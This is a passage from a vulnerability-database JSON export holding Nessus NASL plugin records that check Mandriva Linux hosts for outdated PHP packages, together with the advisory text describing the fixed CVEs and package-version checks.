yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-soap-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sockets-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sqlite-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ssh2-0.11.0-2.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-suhosin-0.9.29-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sybase-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sysvmsg-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sysvsem-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sysvshm-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-tclink-3.4.4-10.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-tidy-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-tokenizer-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-translit-0.6.0-7.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-vld-0.9.1-8.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-wddx-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xattr-1.1.0-6.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xdebug-2.0.5-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xml-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", 
reference:\"php-xmlreader-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xmlrpc-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xmlwriter-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xsl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-zip-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-zlib-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:27", "description": "Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. 
NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe JSON_parser function (ext/json/JSON_parser.c) in PHP 5.2.x before\n5.2.9 allows remote attackers to cause a denial of service\n(segmentation fault) via a malformed string to the json_decode API\nfunction (CVE-2009-1271).\n\n - Fixed upstream bug #48378 (exif_read_data() segfaults on\n certain corrupted .jpeg files) (CVE-2009-2687).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293)\n\nThe _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the\nGD Graphics Library 2.x, does not properly verify a certain\ncolorsTotal structure member, which might allow remote attackers to\nconduct buffer overflow or buffer over-read attacks via a crafted GD\nfile, a different vulnerability than CVE-2009-3293. 
NOTE: some of\nthese details are obtained from third-party information\n(CVE-2009-3546).\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. 
NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThe php-suhosin package has been upgraded to 0.9.22 which has better\nsupport for apache vhosts.\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThis update provides a solution to these vulnerabilities.", "edition": 27, "published": "2009-12-08T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:324)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3546", "CVE-2009-3558", "CVE-2009-1271", "CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "modified": "2009-12-08T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-mhash", 
"p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-ming", "p-cpe:/a:mandriva:linux:php-ini", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-dbase", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:lib64php5_common5", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:php-ncurses", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-simplexml", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", 
"p-cpe:/a:mandriva:linux:php-mime_magic", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-suhosin", "p-cpe:/a:mandriva:linux:php-mysqli"], "id": "MANDRIVA_MDVSA-2009-324.NASL", "href": "https://www.tenable.com/plugins/nessus/43043", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:324. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43043);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-1271\", \"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3546\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_bugtraq_id(35440, 36449, 36712, 37079, 37138);\n script_xref(name:\"MDVSA\", value:\"2009:324\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:324)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. 
NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe JSON_parser function (ext/json/JSON_parser.c) in PHP 5.2.x before\n5.2.9 allows remote attackers to cause a denial of service\n(segmentation fault) via a malformed string to the json_decode API\nfunction (CVE-2009-1271).\n\n - Fixed upstream bug #48378 (exif_read_data() segfaults on\n certain corrupted .jpeg files) (CVE-2009-2687).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293)\n\nThe _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the\nGD Graphics Library 2.x, does not properly verify a certain\ncolorsTotal structure member, which might allow remote attackers to\nconduct buffer overflow or buffer over-read attacks via a crafted GD\nfile, a different vulnerability than CVE-2009-3293. 
NOTE: some of\nthese details are obtained from third-party information\n(CVE-2009-3546).\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. 
NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThe php-suhosin package has been upgraded to 0.9.22 which has better\nsupport for apache vhosts.\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThis update provides a solution to these vulnerabilities.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mime_magic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-simplexml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libphp5_common5-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-bcmath-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-bz2-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-calendar-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-cgi-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", 
reference:\"php-cli-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ctype-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-curl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-dba-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-dbase-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-devel-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-dom-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-exif-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-fcgi-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-filter-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ftp-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-gd-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-gettext-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-gmp-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-hash-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-iconv-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-imap-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ini-5.2.4-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-json-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", 
reference:\"php-ldap-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mbstring-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mcrypt-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mhash-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mime_magic-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ming-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mssql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mysql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mysqli-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ncurses-5.2.4-3.6mdv2008.0\", 